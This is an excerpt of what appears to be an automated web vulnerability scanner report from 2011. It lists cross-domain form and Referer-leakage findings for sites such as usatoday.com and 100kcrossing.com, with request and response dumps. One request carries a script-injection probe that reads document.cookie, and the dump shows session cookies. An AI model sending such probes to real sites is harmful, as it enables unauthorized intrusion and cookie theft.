Host:	http://www.hototc.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.hototc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:30:08 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "45f8-4cca7a20-0"
Last-Modified: Fri, 29 Oct 2010 07:39:12 GMT
Content-Type: text/html
Content-Length: 17912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</p>
<form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post">
<p>
...[SNIP]...

13.5. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/money/world/2011-01-20-chinabuilding20_ST_N.htm

Issue detail

The page contains a form which POSTs data to the domain usatoday.franchisesolutions.com. The form contains the following fields:

nologging
cat_id
cat_id
cat_id
cat_id
cat_id
cat_id
cat_id
cat_id
cat_id
cat_id
cat_id
cat_id
cat_id
cat_id
liq_cap
liq_cap
liq_cap
liq_cap
liq_cap
liq_cap
liq_cap
liq_cap
liq_cap
submit

Request

GET /money/world/2011-01-20-chinabuilding20_ST_N.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14. Cross-domain Referer leakage previous next
There are 24 instances of this issue:

http://www.100kcrossing.com/
http://www.aharrisonbarnes.com/hb-course/
http://www.attorneyresume.com/
http://www.bcgsearch.com/
https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
http://www.facebook.com/BMWUSA
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.feedburner.com/fb/a/emailverifySubmit
http://www.hound.com/
http://www.lawcrossing.com/
http://www.lawfirmstaff.com/
http://www.legalauthority.com/signup.php
http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html
http://www.sourcewatch.org/index.php
http://www.toyota.com/Specials/specialOffersPage.aspx
http://www.toyota.com/owners/apps/maintenance-guides.do
http://www.toyota.com/owners/apps/manuals.do
http://www.toyotafinancial.com/consumer/tfs.portal
http://www.toyotafinancial.com/consumer/tfs.portal
http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
http://www.velaw.com/lawyers/lawyersearch.aspx

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

14.1. http://www.100kcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.100kcrossing.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.100kcrossing.com/?f63f4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E34aed88ca0a=1

The response contains the following links to other domains:

http://css.employmentcrossing.com/jquery/jquery.autocomplete.css
http://css.employmentcrossing.com/style.css
http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://images.employmentcrossing.com/6figure/logo.gif
http://images.employmentcrossing.com/blanker.gif
http://images.employmentcrossing.com/bt_clicktoapply.jpg
http://images.employmentcrossing.com/bt_employers.gif
http://images.employmentcrossing.com/bt_jobseekers.gif
http://images.employmentcrossing.com/central_image/419_100k.jpg
http://images.employmentcrossing.com/employment/articleimages/harrison_small.jpg
http://images.employmentcrossing.com/facebook.jpg
http://images.employmentcrossing.com/free_resume.jpg
http://images.employmentcrossing.com/icon_closewindow.gif
http://images.employmentcrossing.com/img_jobagreegators.gif
http://images.employmentcrossing.com/img_jobsearch.gif
http://images.employmentcrossing.com/img_leadingemployers.jpg
http://images.employmentcrossing.com/img_tellafriend.jpg
http://images.employmentcrossing.com/img_trustedlogo.jpg
http://images.employmentcrossing.com/img_verisign.gif
http://images.employmentcrossing.com/logo_es.jpg
http://images.employmentcrossing.com/twitter.jpg
http://images.employmentcrossing.com/twitter_followme.jpg
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=345&n=a94f730c&
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a94f730c&cb=558459
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://twitter.com/100KXing
http://twitter.com/aharrisonbarnes
http://www.agriculturalcrossing.com/
http://www.aharrisonbarnes.com/
http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/
http://www.aharrisonbarnes.com/hb-course/
http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js
http://www.designingcrossing.com/
http://www.disabilitycrossing.com/
http://www.diversitycrossing.com/
http://www.dubaicrossing.com/
http://www.employmentauthority.com/
http://www.employmentcrossing.com/
http://www.employmentcrossing.com/lcceospeaks.php?id=5482
http://www.employmentcrossing.com/lcterms.php
http://www.employmentcrossing.com/lctestimonials.php
http://www.employmentresearchinstitute.com/
http://www.energycrossing.com/
http://www.facebook.com/pages/100KCrossing/351664632951
http://www.governmentcrossing.com/
http://www.hound.com/
http://www.hourlycrossing.com/
http://www.militarycrossing.com/
http://www.oilandgascrossing.com/
http://www.postdoctoralfellowcrossing.com/
http://www.preferredresumes.com/
http://www.recruitersubmitter.com/
http://www.resumeboomer.com/
http://www.retirementcrossing.com/
http://www.waterplantcrossing.com/

Request

GET /?f63f4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E34aed88ca0a=1 HTTP/1.1
Host: www.100kcrossing.com
Proxy-Connection: keep-alive
Referer: http://www.100kcrossing.com/?f63f4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E34aed88ca0a=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7556cua1kmjisgrmbs54t62tc7; flagimg=UnitedStates.gif; useripcountry=277; useripstate=3896; useripcity=2655979; usercountry=277; userstate=3896; usercity=2655979; regioninfo=2655979%7E32.7830556%7E-96.8066667; __utmz=1.1295654883.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=1.1903501068.1295654883.1295654883.1295654883.1; __utmc=1; __utmb=1.1.10.1295654883

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:07:28 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: Keep-alive
Via: 1.1 AN-0016020122545304
Content-Length: 106674

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Article RSS Feed" href="http://www.100kcrossing.com/rssfeed/xml/rssfeedarticle.xml" />
<link rel="stylesheet" type="text/css" href="http://css.employmentcrossing.com/style.css">
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<td width="9"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a94f730c&cb=558459' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=345&n=a94f730c&' border='0' alt='' /></a>
...[SNIP]...
<td colspan="2" height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<a href="http://www.100kcrossing.com/" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image1','','http://images.employmentcrossing.com/img_home.jpg',1)"><img src="http://images.employmentcrossing.com/6figure/logo.gif" border="0" alt="$100K Jobs, Jobs in $100K - 100KCrossing.com" title="$100K Jobs, Jobs in $100K - 100KCrossing.com"></a><img src="http://images.employmentcrossing.com/img_jobagreegators.gif" name="Image1" border="0" alt="Job Aggregators - 100KCrossing.com" title="Job Aggregators - 100KCrossing.com" align="top" style="margin:2px 0px 0px 5px;">
<br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="5" border="0" alt=""><br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="5" border="0" alt=""><br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="5" border="0" alt=""><br>
...[SNIP]...
<a href="javascript:pageTracker._link('https://www.employmentcrossing.com/lcsignin.php?refid=1553&offer_page=111&pg=index.php&uia=MTczLjE5My4yMTQuMjQz');"><img src="http://images.employmentcrossing.com/bt_jobseekers.gif" width="111" height="24" border="0" alt="Job Seekers - Try IT Now" title="Job Seekers - Try IT Now" align="absmiddle"></a>  <a href="http://www.100kcrossing.com/lcpostnowjob.php"><img src="http://images.employmentcrossing.com/bt_employers.gif" width="111" height="24" border="0" alt="Employers - Try IT Now" title="Employers - Try IT Now" align="absmiddle"></a>
...[SNIP]...
<td><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="7" border="0" alt=""><br>
...[SNIP]...
<td width="499" valign="top"><img src="http://images.employmentcrossing.com/central_image/419_100k.jpg" width="499" border="0" alt="The Most Quality $100K Jobs Anywhere - 100KCrossing" title="The Most Quality $100K Jobs Anywhere - 100KCrossing"></td>
...[SNIP]...
<td colspan="2" height="5" class="bgmain"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="100%" height="43"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="10" border="0" alt=""><br>
...[SNIP]...
<a href="javascript:NewWindow('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.EMPLOYMENTCROSSING.COM&lang=en','verisign','562','500','yes');"><img src="http://images.employmentcrossing.com/img_verisign.gif" width="89" height="40" border="0" alt="VeriSign Secure Site" title="VeriSign Secure Site"></a>
...[SNIP]...
<td width="100%" height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
<link rel="stylesheet" type="text/css" href="http://css.employmentcrossing.com/jquery/jquery.autocomplete.css" />
<style type="text/css">
...[SNIP]...
<td width="7" rowspan="3"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="7" rowspan="3"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="15" border="0" alt=""><br>
...[SNIP]...
</table>
<img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="10" border="0" alt=""><br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="20" border="0" alt=""><br>
...[SNIP]...
<td height="12" colspan="2"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="100%" height="15" class="bgmain"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="100%"><img src="http://images.employmentcrossing.com/img_jobsearch.gif" width="700" height="216" border="0" alt="Compare 100KCrossing with other job sites" title="Compare 100KCrossing with other job sites"></td>
...[SNIP]...
<td class="bgmain" height="20"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10" height="27"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="7" height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="21"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="7" height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="100%" class="bgmain" height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="4" height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
               <td width="120" class="imgtext" style="padding-left:0px;" valign="top">
<img src="http://images.employmentcrossing.com/employment/articleimages/harrison_small.jpg" width="109" height="123" border="0" class="articleimg" alt="CEO A Harrision Barnes - 100KCrossing.com" title="CEO A Harrision Barnes - 100KCrossing.com">
<br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="5" border="0" alt=""><br>
<a href="http://twitter.com/aharrisonbarnes" target="_blank"><img src="http://images.employmentcrossing.com/twitter_followme.jpg" width="95" height="22" border="0" alt="Follow Me on Twitter" title="Follow Me on Twitter"></a>
...[SNIP]...
<span class="textgray17"><a href="http://www.employmentcrossing.com/lcceospeaks.php?id=5482" style="color:#0a75cc;">Being in the Zone</a>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="3" border="0" alt=""><br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="5" border="0" alt=""><br>
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/' rel='bookmark' title='Permanent Link: Do Not Stop Seeing Opportunity: Step Outside Your Mind...s Comfort Zone and Begin to Dream'>Do Not Stop Seeing Opportunity: Step Outside Your Mind...s Comfort Zone and Begin to Dream</a>
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/' rel='bookmark' title='Permanent Link: Push Yourself Outside Your Comfort Zone'>Push Yourself Outside Your Comfort Zone</a>
...[SNIP]...
<div align="right"><a href="http://www.employmentcrossing.com/lcceospeaks.php?id=5482"><strong>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="4" height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
           <td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<td><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="4" height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="20"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td height="12"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<noscript>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="262" height="210" id="map" align="middle">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<a href="http://www.100kcrossing.com/lcresumecritique.php"><img src="http://images.employmentcrossing.com/free_resume.jpg" width="265" height="100" border="0" alt=""></a>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<a href="http://www.100kcrossing.com/lcjsjobdetail.php?akey=8f1b06c64c76ee1d3cf6af16b91f0a79"><img src="http://images.employmentcrossing.com/bt_clicktoapply.jpg" width="111" height="23" border="0" alt="Click to Apply for - 100KCrossing.com" title="Click to Apply for - 100KCrossing.com"></a>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<div align="right"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="4" border="0" alt=""><br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="5" border="0" alt=""><br>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td align="center"><img src="http://images.employmentcrossing.com/img_trustedlogo.jpg" width="251" height="107" border="0" alt=""></td>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td height="2" style="background:url(http://images.employmentcrossing.com/dot.gif);"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<br>+ <a href="http://www.employmentcrossing.com/lctestimonials.php" target="_blank"><u>
...[SNIP]...
<td height="15"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="10" height="1" border="0" alt=""></td>
...[SNIP]...
</a>  <img src="http://images.employmentcrossing.com/icon_closewindow.gif" width="11" height="12" border="0" alt="" align="absmiddle"></div>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="7" border="0" alt=""><br>
...[SNIP]...
<br><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="7" border="0" alt=""><br>
...[SNIP]...
<td width="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="10" height="1" border="0" alt=""></td>
...[SNIP]...
<td height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
</u><img src="http://images.employmentcrossing.com/blanker.gif" width="30" height="1" border="0" alt="">
<strong>
...[SNIP]...
</u><img src="http://images.employmentcrossing.com/blanker.gif" width="30" height="1" border="0" alt="">
<span class="textblue1" style="font-size:14px;">
...[SNIP]...
<td width="18"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<a href="http://www.100kcrossing.com/leadingemployers.php"><img src="http://images.employmentcrossing.com/img_leadingemployers.jpg" width="163" height="21" border="0" alt="Leading Employers" title="Leading Employers"></a>
...[SNIP]...
<a href="javascript:tellafriend('H');"><img src="http://images.employmentcrossing.com/img_tellafriend.jpg" width="95" height="21" border="0" alt="Tell a Friend!" title="Tell a Friend!"></a>
...[SNIP]...
<td><a href="http://twitter.com/100KXing" target="_blank"><img src="http://images.employmentcrossing.com/twitter.jpg" width="163" height="21" border="0" alt="Follow 100KCrossing.com on Twitter" title="Follow 100KCrossing.com on Twitter"></a>
...[SNIP]...
<td width="95"><a href="http://www.facebook.com/pages/100KCrossing/351664632951" target="_blank"><img src="http://images.employmentcrossing.com/facebook.jpg" width="95" height="21" border="0" alt="Be a Fan of 100KCrossing on Facebook - 100KCrossing.com" title="Be a Fan of 100KCrossing on Facebook - 100KCrossing.com"></a>
...[SNIP]...
<td height="10"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
</a> |
                                        <a href="http://www.employmentcrossing.com/lctestimonials.php" target="_blank">Testimonials</a>
...[SNIP]...
<br>
<a href="http://www.employmentcrossing.com/" target="_blank">Jobs</a>
...[SNIP]...
<a/> |
                               <a href="http://www.preferredresumes.com/" target="_blank">Resume Writing Service</a> |
                               <a href="http://www.resumeboomer.com" target="_blank">Post Resume</a> |
                               <a href="http://www.recruitersubmitter.com/" target="_blank">Send Resume</a> |
                               <a href="http://www.employmentauthority.com/" target="_blank">Resume Distribution</a> |
                               <a href="http://www.aharrisonbarnes.com/" target="_blank">Career Advice</a> |
                               <a href="http://www.aharrisonbarnes.com/hb-course/" target="_blank">Job Search Tips</a>
...[SNIP]...
</a> |
                                    <a href="http://www.employmentcrossing.com/lcterms.php" target="_blank">Terms of Use</a>
...[SNIP]...
</a> |
                               <a href="http://www.hound.com/" target="_blank">Job Search Engine |
                               <a href="http://www.100kcrossing.com/sitemap.php">
...[SNIP]...
<br>
                                       <a href="http://www.agriculturalcrossing.com/">Agricultural Jobs</a> | <a href="http://www.designingcrossing.com/">Design Jobs</a> | <a href="http://www.disabilitycrossing.com/">Disabled Professionals Jobs</a> | <a href="http://www.diversitycrossing.com/">Diversity Jobs</a> | <a href="http://www.dubaicrossing.com/">Dubai Jobs</a> | <a href="http://www.energycrossing.com/">Energy Jobs</a> | <a href="http://www.governmentcrossing.com/">Government Jobs</a> | <a href="http://www.hourlycrossing.com/">Hourly Jobs</a> | <a href="http://www.militarycrossing.com/">Military Jobs</a> | <a href="http://www.oilandgascrossing.com/">Oil And Gas Jobs</a> | <a href="http://www.postdoctoralfellowcrossing.com/">Postdoctoral Fellow Jobs</a> | <a href="http://www.retirementcrossing.com/">Retirement Jobs</a> | <a href="http://www.waterplantcrossing.com/">Water Plant Jobs</a>
...[SNIP]...
<td align="center"><a href="http://www.employmentresearchinstitute.com/" target="_blank"><img src="http://images.employmentcrossing.com/logo_es.jpg" width="163" height="50" border="0" alt="Employment Research Institute" title="Employment Research Institute"></a>
...[SNIP]...
<td height="7"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="9"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...

14.2. http://www.aharrisonbarnes.com/hb-course/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/hb-course/

Issue detail

The page was loaded from a URL containing a query string:

http://www.aharrisonbarnes.com/hb-course/?utm_source=Judged&utm_medium=Banner&utm_campaign=hbcourse-thrive-212x212\

The response contains the following links to other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=265&n=afb7b597
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=afb7b597&cb=559569
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.1shoppingcart.com/SecureCart/SecureCart.aspx?mid=5B755568-CA79-4722-A277-1C4534523A6A&pid=45793872a819482f8fe5dfeebbc6de67&bn=1
http://www.attorneyresume.com/
http://www.bcgsearch.com/
http://www.employmentauthority.com/
http://www.employmentcrossing.com/
http://www.employmentpotentials.com/
http://www.employmentresearchinstitute.com/
http://www.granted.com/
http://www.hound.com/
http://www.jd2b.com/
http://www.jdjournal.com/
http://www.judged.com/
http://www.lateralattorneyreport.com/
